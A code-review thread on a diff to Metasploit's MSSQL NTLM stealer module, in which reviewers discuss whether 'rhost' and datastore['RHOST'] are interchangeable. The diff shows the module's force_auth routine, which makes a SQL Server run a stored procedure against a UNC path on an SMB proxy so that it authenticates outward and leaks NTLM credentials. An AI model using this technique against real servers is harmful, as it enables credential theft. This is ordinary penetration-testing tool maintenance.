modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb

```diff
@@ -63,16 +63,16 @@ def run_host(ip)
   # Method to force sql server to authenticate
   def force_auth(sprocedure,smbproxy)
 
-    print_status("Forcing SQL Server at #{rhost} to auth to #{smbproxy} via #{sprocedure}...")
+    print_status("Forcing SQL Server at #{datastore['RHOST']} to auth to #{smbproxy} via #{sprocedure}...")
 
     # Generate random file name
     rand_filename = Rex::Text.rand_text_alpha(8, bad='')
 
     # Setup query
     sql = "#{sprocedure} '\\\\#{smbproxy}\\#{rand_filename}'"
-    result = mssql_query(sql, false) if mssql_login_datastore
+    result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
     column_data = result[:rows]
-    print_good("Successfully executed #{sprocedure} on #{rhost}")
+    print_good("Successfully executed #{sprocedure} on #{datastore['RHOST']}")
```

Comment:
These are likely the same thing, but it might be worth verifying.

Reply:
After digging a bit, I think this is fine.  I'm not seeing anything that leads me to think this is a problem.  There is the rhost shim in `post` modules mentioned by  @sjanusz-r7, a private definition in `lib/metasploit/framework/login_scanner/rex_socket.rb`, and a placeholder in `lib/metasploit/framework/tcp/client.rb` so I don't see anything that would make this an issue on the aux side.